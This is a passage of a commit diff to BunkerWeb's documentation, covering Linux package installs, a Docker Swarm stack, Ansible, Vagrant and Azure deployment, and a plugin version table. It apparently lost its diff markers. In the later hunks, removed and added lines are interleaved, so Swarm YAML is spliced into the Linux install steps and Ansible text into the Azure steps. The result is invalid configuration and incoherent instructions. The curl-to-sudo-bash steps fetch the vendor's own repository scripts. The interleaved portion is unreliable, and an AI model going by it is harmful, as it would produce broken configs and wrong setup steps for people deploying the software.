Also we do not yet run automated tests on Ubuntu 24.04, so please consider this version as experimental.
The first step is to add NGINX official repository :
```shell
sudo apt install -y curl gnupg2 ca-certificates lsb-release ubuntu-keyring && \
curl https://nginx.org/keys/nginx_signing.key | gpg --dearmor \
| sudo tee /usr/share/keyrings/nginx-archive-keyring.gpg >/dev/null && \
echo "deb [signed-by=/usr/share/keyrings/nginx-archive-keyring.gpg] \
http://nginx.org/packages/ubuntu jammy nginx" \
| sudo tee /etc/apt/sources.list.d/nginx.list
```
You should now be able to install NGINX 1.24.0 :
```shell
sudo apt update && \
sudo apt install -y nginx=1.24.0-1~jammy
```
!!! warning "Testing/dev version"
If you use the `testing` or `dev` version, you will need to add the `force-bad-version` directive to your `/etc/dpkg/dpkg.cfg` file before installing BunkerWeb.
```shell
echo "force-bad-version" | sudo tee -a /etc/dpkg/dpkg.cfg
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.deb.sh | sudo bash && \
sudo apt update && \
sudo -E apt install -y bunkerweb=1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `apt upgrade`, you can use the following command :
```shell
sudo apt-mark hold nginx bunkerweb
```
=== "Fedora"
Fedora already provides NGINX 1.24.0 that we support :
```shell
sudo dnf install -y nginx-1.24.0
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.rpm.sh | \
sed 's/yum install -y pygpgme --disablerepo='\''bunkerity_bunkerweb'\''/yum install -y python-gnupg/g' | \
sed 's/pypgpme_check=`rpm -qa | grep -qw pygpgme`/python-gnupg_check=`rpm -qa | grep -qw python-gnupg`/g' | sudo bash && \
sudo dnf makecache && \
sudo -E dnf install -y bunkerweb-1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `dnf upgrade`, you can use the following command :
```shell
sudo dnf versionlock add nginx && \
sudo dnf versionlock add bunkerweb
```
=== "RedHat"
The first step is to add NGINX official repository. Create the following file at `/etc/yum.repos.d/nginx.repo` :
```conf
[nginx-stable]
name=nginx stable repo
baseurl=http://nginx.org/packages/centos/$releasever/$basearch/
gpgcheck=1
enabled=1
gpgkey=https://nginx.org/keys/nginx_signing.key
module_hotfixes=true
[nginx-mainline]
name=nginx mainline repo
baseurl=http://nginx.org/packages/mainline/centos/$releasever/$basearch/
gpgcheck=1
enabled=0
gpgkey=https://nginx.org/keys/nginx_signing.key
module_hotfixes=true
```
You should now be able to install NGINX 1.24.0 :
```shell
sudo dnf install nginx-1.24.0
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
sudo dnf install -y epel-release && \
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.rpm.sh | sudo bash && \
sudo dnf check-update && \
sudo -E dnf install -y bunkerweb-1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `dnf upgrade`, you can use the following command :
```shell
sudo dnf versionlock add nginx && \
sudo dnf versionlock add bunkerweb
```
The configuration of BunkerWeb is done by editing the `/etc/bunkerweb/variables.env` file :
```conf
MY_SETTING_1=value1
MY_SETTING_2=value2
...
```
BunkerWeb is managed using systemctl :
- Check BunkerWeb status : `systemctl status bunkerweb`
- Start it if it's stopped : `systemctl start bunkerweb`
- Stop it if it's started : `systemctl stop bunkerweb`
- Reload it to apply new configuration : `systemctl reload bunkerweb`
- And restart it : `systemctl restart bunkerweb`
## Docker autoconf
<figure markdown>
@ -443,186 +659,6 @@ networks:
name: bw-services
```
## Swarm
<figure markdown>
![Overview](assets/img/integration-swarm.svg){ align=center, width="600" }
<figcaption>Docker Swarm integration</figcaption>
</figure>
!!! info "Docker autoconf"
The Swarm integration is similar to the Docker autoconf one (but with services instead of containers). Please read the [Docker autoconf integration section](#docker-autoconf) first if needed.
To enable automatic configuration of BunkerWeb instances, the **autoconf** service requires access to the Docker API. This service listens for Docker Swarm events, such as service creation or deletion, and seamlessly configures the **BunkerWeb instances** in real-time without any downtime. It also monitors other Swarm objects, such as [configs](https://docs.docker.com/engine/swarm/configs/), for custom configurations.
Similar to the [Docker autoconf integration](#docker-autoconf), configuration for web services is defined using labels that start with the **bunkerweb** prefix.
For an optimal setup, it is recommended to schedule the **BunkerWeb service** as a ***global service*** on all nodes, while the **autoconf, scheduler, and Docker API proxy services** should be scheduled as ***single replicated services***. Please note that the Docker API proxy service needs to be scheduled on a manager node unless you configure it to use a remote API (which is not covered in the documentation).
Since multiple instances of BunkerWeb are running, a shared data store implemented as a [Redis](https://redis.io/) service must be created. These instances will utilize the Redis service to cache and share data. Further details regarding the Redis settings can be found [here](settings.md#redis).
As for the database volume, the documentation does not specify a specific approach. Choosing either a shared folder or a specific driver for the database volume is dependent on your unique use-case and is left as an exercise for the reader.
!!! info "Database backend"
Please be aware that our instructions assume you are using MariaDB as the default database backend, as configured by the `DATABASE_URI` setting. However, we understand that you may prefer to utilize alternative backends for your Docker integration. If that is the case, rest assured that other database backends are still possible. See docker-compose files in the [misc/integrations folder](https://github.com/bunkerity/bunkerweb/tree/v1.5.7/misc/integrations) folder of the repository for more information.
Clustered database backends setup are out-of-the-scope of this documentation.
Here is the stack boilerplate that you can deploy using `docker stack deploy` :
```yaml
version: "3.5"
services:
bunkerweb:
image: bunkerity/bunkerweb:1.5.7
ports:
- published: 80
target: 8080
mode: host
protocol: tcp
- published: 443
target: 8443
mode: host
protocol: tcp
environment:
- SERVER_NAME=
- DATABASE_URI=mariadb+pymysql://bunkerweb:changeme@bw-db:3306/db # Remember to set a stronger password for the database
- SWARM_MODE=yes
- MULTISITE=yes
- USE_REDIS=yes
- REDIS_HOST=bw-redis
- API_WHITELIST_IP=127.0.0.0/8 10.20.30.0/24
networks:
- bw-universe
- bw-services
deploy:
mode: global
placement:
constraints:
- "node.role == worker"
labels:
- "bunkerweb.INSTANCE=yes"
bw-autoconf:
image: bunkerity/bunkerweb-autoconf:1.5.7
environment:
- SWARM_MODE=yes
- DOCKER_HOST=tcp://bw-docker:2375
- DATABASE_URI=mariadb+pymysql://bunkerweb:changeme@bw-db:3306/db # Remember to set a stronger password for the database
networks:
- bw-universe
- bw-docker
deploy:
placement:
constraints:
- "node.role == worker"
bw-docker:
image: tecnativa/docker-socket-proxy:nightly
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
environment:
- CONFIGS=1
- CONTAINERS=1
- SERVICES=1
- SWARM=1
- TASKS=1
- LOG_LEVEL=warning
networks:
- bw-docker
deploy:
placement:
constraints:
- "node.role == manager"
bw-scheduler:
image: bunkerity/bunkerweb-scheduler:1.5.7
environment:
- SWARM_MODE=yes
- DOCKER_HOST=tcp://bw-docker:2375
- DATABASE_URI=mariadb+pymysql://bunkerweb:changeme@bw-db:3306/db
networks:
- bw-universe
- bw-docker
deploy:
placement:
constraints:
- "node.role == worker"
bw-db:
image: mariadb:10.10
environment:
- MYSQL_RANDOM_ROOT_PASSWORD=yes
- MYSQL_DATABASE=db
- MYSQL_USER=bunkerweb
- MYSQL_PASSWORD=changeme
volumes:
- bw-data:/var/lib/mysql
networks:
- bw-docker
deploy:
placement:
constraints:
- "node.role == worker"
bw-redis:
image: redis:7-alpine
networks:
- bw-universe
deploy:
placement:
constraints:
- "node.role == worker"
volumes:
bw-data:
networks:
bw-universe:
name: bw-universe
driver: overlay
attachable: true
ipam:
config:
- subnet: 10.20.30.0/24
bw-services:
name: bw-services
driver: overlay
attachable: true
bw-docker:
name: bw-docker
driver: overlay
attachable: true
```
!!! info "Swarm mandatory setting"
Please note that the `SWARM_MODE=yes` environment variable is mandatory when using the Swarm integration.
Once the BunkerWeb Swarm stack is set up and running (see autoconf and scheduler logs for more information), you will be able to deploy web applications in the cluster and use labels to dynamically configure BunkerWeb :
```yaml
version: "3.5"
services:
myapp:
image: mywebapp:4.2
networks:
- bw-services
deploy:
placement:
constraints:
- "node.role==worker"
labels:
- "bunkerweb.MY_SETTING_1=value1"
- "bunkerweb.MY_SETTING_2=value2"
networks:
bw-services:
external: true
name: bw-services
```
## Kubernetes
<figure markdown>
@ -937,362 +973,237 @@ spec:
...
```
## Linux
## Swarm
<figure markdown>
![Overview](assets/img/integration-linux.svg){ align=center, width="600" }
<figcaption>Linux integration</figcaption>
![Overview](assets/img/integration-swarm.svg){ align=center, width="600" }
<figcaption>Docker Swarm integration</figcaption>
</figure>
Supported Linux distributions for BunkerWeb (amd64/x86_64 and arm64/aarch64 architectures) include:
!!! info "Docker autoconf"
The Swarm integration is similar to the Docker autoconf one (but with services instead of containers). Please read the [Docker autoconf integration section](#docker-autoconf) first if needed.
- Debian 12 "Bookworm"
- Ubuntu 22.04 "Jammy"
- Ubuntu 24.04 "Noble"
- Fedora 39
- Red Hat Enterprise Linux (RHEL) 8.9
- Red Hat Enterprise Linux (RHEL) 9.3
To enable automatic configuration of BunkerWeb instances, the **autoconf** service requires access to the Docker API. This service listens for Docker Swarm events, such as service creation or deletion, and seamlessly configures the **BunkerWeb instances** in real-time without any downtime. It also monitors other Swarm objects, such as [configs](https://docs.docker.com/engine/swarm/configs/), for custom configurations.
Please ensure that you have **NGINX 1.24.0 installed before installing BunkerWeb**. For all distributions, except Fedora, it is mandatory to use prebuilt packages from the [official NGINX repository](https://nginx.org/en/linux_packages.html). Compiling NGINX from source or using packages from different repositories will not work with the official prebuilt packages of BunkerWeb. However, you have the option to build BunkerWeb from source.
Similar to the [Docker autoconf integration](#docker-autoconf), configuration for web services is defined using labels that start with the **bunkerweb** prefix.
To simplify the installation process, Linux package repositories for BunkerWeb are available on [PackageCloud](https://packagecloud.io/bunkerity/bunkerweb). They provide a bash script that automatically adds and trusts the repository. You can follow the provided script for automatic setup, or opt for [manual installation](https://packagecloud.io/bunkerity/bunkerweb/install) instructions if you prefer.
For an optimal setup, it is recommended to schedule the **BunkerWeb service** as a ***global service*** on all nodes, while the **autoconf, scheduler, and Docker API proxy services** should be scheduled as ***single replicated services***. Please note that the Docker API proxy service needs to be scheduled on a manager node unless you configure it to use a remote API (which is not covered in the documentation).
=== "Debian"
Since multiple instances of BunkerWeb are running, a shared data store implemented as a [Redis](https://redis.io/) service must be created. These instances will utilize the Redis service to cache and share data. Further details regarding the Redis settings can be found [here](settings.md#redis).
The first step is to add NGINX official repository :
As for the database volume, the documentation does not specify a specific approach. Choosing either a shared folder or a specific driver for the database volume is dependent on your unique use-case and is left as an exercise for the reader.
```shell
sudo apt install -y curl gnupg2 ca-certificates lsb-release debian-archive-keyring && \
curl https://nginx.org/keys/nginx_signing.key | gpg --dearmor \
| sudo tee /usr/share/keyrings/nginx-archive-keyring.gpg >/dev/null && \
echo "deb [signed-by=/usr/share/keyrings/nginx-archive-keyring.gpg] \
http://nginx.org/packages/debian `lsb_release -cs` nginx" \
| sudo tee /etc/apt/sources.list.d/nginx.list
```
!!! info "Database backend"
Please be aware that our instructions assume you are using MariaDB as the default database backend, as configured by the `DATABASE_URI` setting. However, we understand that you may prefer to utilize alternative backends for your Docker integration. If that is the case, rest assured that other database backends are still possible. See docker-compose files in the [misc/integrations folder](https://github.com/bunkerity/bunkerweb/tree/v1.5.7/misc/integrations) folder of the repository for more information.
You should now be able to install NGINX 1.24.0 :
Clustered database backends setup are out-of-the-scope of this documentation.
```shell
sudo apt update && \
sudo apt install -y nginx=1.24.0-1~$(lsb_release -cs)
```
Here is the stack boilerplate that you can deploy using `docker stack deploy` :
!!! warning "Testing/dev version"
If you use the `testing` or `dev` version, you will need to add the `force-bad-version` directive to your `/etc/dpkg/dpkg.cfg` file before installing BunkerWeb.
```yaml
version: "3.5"
```shell
echo "force-bad-version" | sudo tee -a /etc/dpkg/dpkg.cfg
```
services:
bunkerweb:
image: bunkerity/bunkerweb:1.5.7
ports:
- published: 80
target: 8080
mode: host
protocol: tcp
- published: 443
target: 8443
mode: host
protocol: tcp
environment:
- SERVER_NAME=
- DATABASE_URI=mariadb+pymysql://bunkerweb:changeme@bw-db:3306/db # Remember to set a stronger password for the database
- SWARM_MODE=yes
- MULTISITE=yes
- USE_REDIS=yes
- REDIS_HOST=bw-redis
- API_WHITELIST_IP=127.0.0.0/8 10.20.30.0/24
networks:
- bw-universe
- bw-services
deploy:
mode: global
placement:
constraints:
- "node.role == worker"
labels:
- "bunkerweb.INSTANCE=yes"
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
bw-autoconf:
image: bunkerity/bunkerweb-autoconf:1.5.7
environment:
- SWARM_MODE=yes
- DOCKER_HOST=tcp://bw-docker:2375
- DATABASE_URI=mariadb+pymysql://bunkerweb:changeme@bw-db:3306/db # Remember to set a stronger password for the database
networks:
- bw-universe
- bw-docker
deploy:
placement:
constraints:
- "node.role == worker"
```shell
export UI_WIZARD=1
```
bw-docker:
image: tecnativa/docker-socket-proxy:nightly
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
environment:
- CONFIGS=1
- CONTAINERS=1
- SERVICES=1
- SWARM=1
- TASKS=1
- LOG_LEVEL=warning
networks:
- bw-docker
deploy:
placement:
constraints:
- "node.role == manager"
And finally install BunkerWeb 1.5.7 :
bw-scheduler:
image: bunkerity/bunkerweb-scheduler:1.5.7
environment:
- SWARM_MODE=yes
- DOCKER_HOST=tcp://bw-docker:2375
- DATABASE_URI=mariadb+pymysql://bunkerweb:changeme@bw-db:3306/db
networks:
- bw-universe
- bw-docker
deploy:
placement:
constraints:
- "node.role == worker"
```shell
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.deb.sh | sudo bash && \
sudo apt update && \
sudo -E apt install -y bunkerweb=1.5.7
```
bw-db:
image: mariadb:10.10
environment:
- MYSQL_RANDOM_ROOT_PASSWORD=yes
- MYSQL_DATABASE=db
- MYSQL_USER=bunkerweb
- MYSQL_PASSWORD=changeme
volumes:
- bw-data:/var/lib/mysql
networks:
- bw-docker
deploy:
placement:
constraints:
- "node.role == worker"
To prevent upgrading NGINX and/or BunkerWeb packages when executing `apt upgrade`, you can use the following command :
bw-redis:
image: redis:7-alpine
networks:
- bw-universe
deploy:
placement:
constraints:
- "node.role == worker"
```shell
sudo apt-mark hold nginx bunkerweb
```
volumes:
bw-data:
=== "Ubuntu"
!!! example "Specifications for Ubuntu 24.04"
As of Ubuntu 24.04, the `nginx` package is not available in the official repository. You will need to use the `jammy` repository to install NGINX 1.24.0.
Also we do not yet run automated tests on Ubuntu 24.04, so please consider this version as experimental.
The first step is to add NGINX official repository :
```shell
sudo apt install -y curl gnupg2 ca-certificates lsb-release ubuntu-keyring && \
curl https://nginx.org/keys/nginx_signing.key | gpg --dearmor \
| sudo tee /usr/share/keyrings/nginx-archive-keyring.gpg >/dev/null && \
echo "deb [signed-by=/usr/share/keyrings/nginx-archive-keyring.gpg] \
http://nginx.org/packages/ubuntu jammy nginx" \
| sudo tee /etc/apt/sources.list.d/nginx.list
```
You should now be able to install NGINX 1.24.0 :
```shell
sudo apt update && \
sudo apt install -y nginx=1.24.0-1~jammy
```
!!! warning "Testing/dev version"
If you use the `testing` or `dev` version, you will need to add the `force-bad-version` directive to your `/etc/dpkg/dpkg.cfg` file before installing BunkerWeb.
```shell
echo "force-bad-version" | sudo tee -a /etc/dpkg/dpkg.cfg
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.deb.sh | sudo bash && \
sudo apt update && \
sudo -E apt install -y bunkerweb=1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `apt upgrade`, you can use the following command :
```shell
sudo apt-mark hold nginx bunkerweb
```
=== "Fedora"
Fedora already provides NGINX 1.24.0 that we support :
```shell
sudo dnf install -y nginx-1.24.0
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.rpm.sh | \
sed 's/yum install -y pygpgme --disablerepo='\''bunkerity_bunkerweb'\''/yum install -y python-gnupg/g' | \
sed 's/pypgpme_check=`rpm -qa | grep -qw pygpgme`/python-gnupg_check=`rpm -qa | grep -qw python-gnupg`/g' | sudo bash && \
sudo dnf makecache && \
sudo -E dnf install -y bunkerweb-1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `dnf upgrade`, you can use the following command :
```shell
sudo dnf versionlock add nginx && \
sudo dnf versionlock add bunkerweb
```
=== "RedHat"
The first step is to add NGINX official repository. Create the following file at `/etc/yum.repos.d/nginx.repo` :
```conf
[nginx-stable]
name=nginx stable repo
baseurl=http://nginx.org/packages/centos/$releasever/$basearch/
gpgcheck=1
enabled=1
gpgkey=https://nginx.org/keys/nginx_signing.key
module_hotfixes=true
[nginx-mainline]
name=nginx mainline repo
baseurl=http://nginx.org/packages/mainline/centos/$releasever/$basearch/
gpgcheck=1
enabled=0
gpgkey=https://nginx.org/keys/nginx_signing.key
module_hotfixes=true
```
You should now be able to install NGINX 1.24.0 :
```shell
sudo dnf install nginx-1.24.0
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
sudo dnf install -y epel-release && \
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.rpm.sh | sudo bash && \
sudo dnf check-update && \
sudo -E dnf install -y bunkerweb-1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `dnf upgrade`, you can use the following command :
```shell
sudo dnf versionlock add nginx && \
sudo dnf versionlock add bunkerweb
```
The configuration of BunkerWeb is done by editing the `/etc/bunkerweb/variables.env` file :
```conf
MY_SETTING_1=value1
MY_SETTING_2=value2
...
networks:
bw-universe:
name: bw-universe
driver: overlay
attachable: true
ipam:
config:
- subnet: 10.20.30.0/24
bw-services:
name: bw-services
driver: overlay
attachable: true
bw-docker:
name: bw-docker
driver: overlay
attachable: true
```
BunkerWeb is managed using systemctl :
!!! info "Swarm mandatory setting"
Please note that the `SWARM_MODE=yes` environment variable is mandatory when using the Swarm integration.
- Check BunkerWeb status : `systemctl status bunkerweb`
- Start it if it's stopped : `systemctl start bunkerweb`
- Stop it if it's started : `systemctl stop bunkerweb`
- And restart : `systemctl restart bunkerweb`
Once the BunkerWeb Swarm stack is set up and running (see autoconf and scheduler logs for more information), you will be able to deploy web applications in the cluster and use labels to dynamically configure BunkerWeb :
## Ansible
```yaml
version: "3.5"
services:
myapp:
image: mywebapp:4.2
networks:
- bw-services
deploy:
placement:
constraints:
- "node.role==worker"
labels:
- "bunkerweb.MY_SETTING_1=value1"
- "bunkerweb.MY_SETTING_2=value2"
networks:
bw-services:
external: true
name: bw-services
```
## Microsoft Azure
<figure markdown>
![Overview](assets/img/integration-ansible.svg){ align=center, width="600" }
<figcaption>Ansible integration</figcaption>
![Overview](assets/img/integration-azure.webp){ align=center, width="600" }
<figcaption>Azure integration</figcaption>
</figure>
Supported Linux distributions for BunkerWeb (amd64/x86_64 and arm64/aarch64 architectures) include:
!!! info "Recommended VM size"
Please be aware while you choose the SKU of the VM. You must select a SKU compatible with Gen2 VM and we recommend starting at B2s or Ds2 series for optimal use.
- Debian 12 "Bookworm"
- Ubuntu 22.04 "Jammy"
- Ubuntu 24.04 "Noble"
- Fedora 39
- Red Hat Enterprise Linux (RHEL) 8.9
- Red Hat Enterprise Linux (RHEL) 9.3
You can easily deploy BunkerWeb on your Azure subscription in several ways:
To simplify the deployment and configuration process, [Ansible](https://docs.ansible.com/ansible/latest/index.html) can be used as an IT automation tool. Ansible enables you to configure systems, deploy software, and perform advanced IT tasks such as continuous deployments or zero downtime rolling updates.
- Azure CLI in Cloud Shell
- Azure ARM Template
- Azure portal via the Marketplace
For BunkerWeb, there is a dedicated Ansible role available on [Ansible Galaxy](https://galaxy.ansible.com/bunkerity/bunkerweb).
=== "Cloud Shell"
To proceed with the BunkerWeb Ansible role setup, follow these steps:
Create a resource group. Replace value `RG_NAME`
1. Begin by creating an inventory file that lists the IP addresses or FQDNs of the remote systems you want to manage. You can either add this information to the `/etc/ansible/hosts` file or create a separate inventory file such as `inventory.yml`. Here's an example using a TOML format:
```toml
[mybunkers]
192.0.2.50
192.0.2.51
192.0.2.52
```bash
az group create --name "RG_NAME" --location "LOCATION"
```
2. Next, establish SSH connections to the managed nodes by adding your public SSH keys to the `authorized_keys` file on each remote system. Verify that you can successfully connect to the nodes using SSH.
Create a VM with `Standard_B2s` SKU in the location of the resource group. Replace values `RG_NAME`, `VM_NAME`, `VNET_NAME`, `SUBNET_NAME`
3. Create a playbook file, such as `playbook.yml`, which will define the desired configuration using the BunkerWeb Ansible role. Here's an example playbook configuration:
```bash
```yaml
---
- hosts: all
become: true
roles:
- bunkerity.bunkerweb
az vm create --resource-group "RG_NAME" --name "VM_NAME" --image bunkerity:bunkerweb:bunkerweb:latest --accept-term --generate-ssh-keys --vnet-name "VNET_NAME" --size Standard_B2s --subnet "SUBNET_NAME"
```
4. Execute the playbook using the `ansible-playbook` command, providing the inventory file and the playbook file as arguments. For example:
Full command. Replace values `RG_NAME`, `VM_NAME`, `LOCATION`, `HOSTNAME`, `USERNAME`, `PUBLIC_IP`, `VNET_NAME`, `SUBNET_NAME`, `NSG_NAME`
```shell
ansible-playbook -i inventory.yml playbook.yml
```bash
az vm create --resource-group "RG_NAME" --name "VM_NAME" --location "LOCATION" --image bunkerity:bunkerweb:bunkerweb:latest --accept-term --generate-ssh-keys --computer-name "HOSTNAME" --admin-username "USERNAME" --public-ip-address "PUBLIC_IP" --public-ip-address-allocation Static --size Standard_B2s --public-ip-sku Standard --os-disk-delete-option Delete --nic-delete-option Delete --vnet-name "VNET_NAME" --subnet "SUBNET_NAME" --nsg "NSG_NAME"
```
By running the playbook, Ansible will apply the BunkerWeb role to all the hosts specified in the inventory, setting up the desired configuration.
=== "ARM Template"
the configuration of BunkerWeb is done by using specific role variables :
!!! info "Permissions requirement"
To deploy a ARM template, you need write access on the resources you're deploying and access to all operations on the Microsoft.Resources/deployments resource type.
To deploy a virtual machine, you need Microsoft.Compute/virtualMachines/write and Microsoft.Resources/deployments/* permissions. The what-if operation has the same permission requirements.
| Name | Type | Description | Default value |
| :-------------------: | :--------: | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------- |
| `bunkerweb_version` | string | Version of BunkerWeb to install. | `1.5.7` |
| `nginx_version` | string | Version of NGINX to install. | `1.24.0` |
| `freeze_versions` | boolean | Prevent upgrade of BunkerWeb and NGINX when performing packages upgrades. | `true` |
| `variables_env` | string | Path of the variables.env file to configure BunkerWeb. | `files/variables.env` |
| `enable_ui` | boolean | Activate the web UI. | `false` |
| `custom_ui` | string | Path of the ui.env file to configure the web UI. | `files/ui.env` |
| `custom_configs_path` | Dictionary | Each entry is a path of the folder containing custom configurations. Keys are the type of custom configs : `http`, `server-http`, `modsec`, `modsec-crs` and `default-server-http` | empty values |
| `custom_www` | string | Path of the www directory to upload. | empty value |
| `custom_plugins` | string | Path of the plugins directory to upload. | empty value |
| `custom_www_owner` | string | Default owner for www files and folders. | `nginx` |
| `custom_www_group` | string | Default group for www files and folders. | `nginx` |
Deploy the ARM Template:
## Vagrant
[![Deploy to Azure](assets/img/integration-azure-deploy.svg)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2Fbunkerity%2Fbunkerweb%2Fmaster%2Fmisc%2Fintegrations%2Fazure-arm-template.json){:target="_blank"}
<!-- TODO
<figure markdown>
![Overview](assets/img/integration-vagrant.svg){ align=center }
<figcaption>BunkerWeb integration with Vagrant</figcaption>
</figure>
-->
=== "Marketplace"
List of supported providers :
Login in [Azure portal](https://portal.azure.com){:target="_blank"}.
- virtualbox
- libvirt
Get BunkerWeb from the [Create ressource menu](https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/bunkerity.bunkerweb){:target="_blank"}.
!!! note "Supported Base Images"
Please be aware that the provided Vagrant boxes are based **exclusively on Ubuntu 22.04 "Jammy"**. While BunkerWeb supports other Linux distributions, the Vagrant setup currently only supports Ubuntu 22.04 as the base operating system. This ensures a consistent and reliable environment for users who want to deploy BunkerWeb using Vagrant.
Similar to other BunkerWeb integrations, the Vagrant setup uses **NGINX version 1.24.0**. This specific version is required to ensure compatibility and smooth functioning with BunkerWeb. Additionally, the Vagrant box includes **PHP** pre-installed, providing a ready-to-use environment for hosting PHP-based applications alongside BunkerWeb.
By using the provided Vagrant box based on Ubuntu 22.04 "Jammy", you benefit from a well-configured and integrated setup, allowing you to focus on developing and securing your applications with BunkerWeb without worrying about the underlying infrastructure.
Here are the steps to install BunkerWeb using Vagrant on Ubuntu with the supported virtualization providers (VirtualBox, and libvirt):
1. Make sure you have Vagrant and one of the supported virtualization providers (VirtualBox or libvirt) installed on your system.
2. There are two ways to install the Vagrant box with BunkerWeb: either by using a provided Vagrantfile to configure your virtual machine or by creating a new box based on the existing BunkerWeb Vagrant box, offering you flexibility in how you set up your development environment.
=== "Vagrantfile"
```shell
Vagrant.configure("2") do |config|
config.vm.box = "bunkerity/bunkerweb"
end
```
Depending on the virtualization provider you choose, you may need to install additional plugins:
* For **libvirt**, install the `vagrant-libvirt plugin`. For more information, see the [Vagrant documentation](https://www.vagrantup.com/docs/providers).
* For **VirtualBox**, install the `vagrant-vbguest` plugin. For more information, see the [Vagrant documentation](https://www.vagrantup.com/docs/providers).
=== "New Vagrant Box"
```shell
vagrant init bunkerity/bunkerweb
```
Depending on the virtualization provider you choose, you may need to install additional plugins:
* For **libvirt**, install the `vagrant-libvirt plugin`. For more information, see the [Vagrant documentation](https://www.vagrantup.com/docs/providers).
* For **VirtualBox**, install the `vagrant-vbguest` plugin. For more information, see the [Vagrant documentation](https://www.vagrantup.com/docs/providers).
After installing the necessary plugins for your chosen virtualization provider, run the following command to start the virtual machine and install BunkerWeb:
```shell
vagrant up --provider=virtualbox # or --provider=libvirt
```
Finally, to access the virtual machine using SSH, execute the following command:
```shell
vagrant ssh
```
**Example Vagrantfile**
Here is an example `Vagrantfile` for installing BunkerWeb on Ubuntu 22.04 "Jammy" using the different supported virtualization providers:
```shell
Vagrant.configure("2") do |config|
# Ubuntu 22.04 "Jammy"
config.vm.box = "bunkerity/bunkerweb"
# Uncomment the desired virtualization provider
# For VirtualBox (default)
config.vm.provider "virtualbox"
# For libvirt
# config.vm.provider "libvirt"
end
```
You can also go through the [Marketplace](https://azuremarketplace.microsoft.com/fr-fr/marketplace/apps/bunkerity.bunkerweb?tab=Overview){:target="_blank"}.

59
docs/plugins.md
View file

@ -8,13 +8,13 @@ Here is the list of "official" plugins that we maintain (see the [bunkerweb-plug
| Name | Version | Description | Link |
| :------------: | :-----: | :------------------------------------------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------------------------------------: |
| **ClamAV** | 1.4 | Automatically scans uploaded files with the ClamAV antivirus engine and denies the request when a file is detected as malicious. | [bunkerweb-plugins/clamav](https://github.com/bunkerity/bunkerweb-plugins/tree/main/clamav) |
| **Coraza** | 1.4 | Inspect requests using a the Coraza WAF (alternative of ModSecurity). | [bunkerweb-plugins/coraza](https://github.com/bunkerity/bunkerweb-plugins/tree/main/coraza) |
| **CrowdSec** | 1.4 | CrowdSec bouncer for BunkerWeb. | [bunkerweb-plugins/crowdsec](https://github.com/bunkerity/bunkerweb-plugins/tree/main/crowdsec) |
| **Discord** | 1.4 | Send security notifications to a Discord channel using a Webhook. | [bunkerweb-plugins/discord](https://github.com/bunkerity/bunkerweb-plugins/tree/main/discord) |
| **Slack** | 1.4 | Send security notifications to a Slack channel using a Webhook. | [bunkerweb-plugins/slack](https://github.com/bunkerity/bunkerweb-plugins/tree/main/slack) |
| **VirusTotal** | 1.4 | Automatically scans uploaded files with the VirusTotal API and denies the request when a file is detected as malicious. | [bunkerweb-plugins/virustotal](https://github.com/bunkerity/bunkerweb-plugins/tree/main/virustotal) |
| **WebHook** | 1.4 | Send security notifications to a custom HTTP endpoint using a Webhook. | [bunkerweb-plugins/webhook](https://github.com/bunkerity/bunkerweb-plugins/tree/main/webhook) |
| **ClamAV** | 1.5 | Automatically scans uploaded files with the ClamAV antivirus engine and denies the request when a file is detected as malicious. | [bunkerweb-plugins/clamav](https://github.com/bunkerity/bunkerweb-plugins/tree/main/clamav) |
| **Coraza** | 1.5 | Inspect requests using a the Coraza WAF (alternative of ModSecurity). | [bunkerweb-plugins/coraza](https://github.com/bunkerity/bunkerweb-plugins/tree/main/coraza) |
| **CrowdSec** | 1.5 | CrowdSec bouncer for BunkerWeb. | [bunkerweb-plugins/crowdsec](https://github.com/bunkerity/bunkerweb-plugins/tree/main/crowdsec) |
| **Discord** | 1.5 | Send security notifications to a Discord channel using a Webhook. | [bunkerweb-plugins/discord](https://github.com/bunkerity/bunkerweb-plugins/tree/main/discord) |
| **Slack** | 1.5 | Send security notifications to a Slack channel using a Webhook. | [bunkerweb-plugins/slack](https://github.com/bunkerity/bunkerweb-plugins/tree/main/slack) |
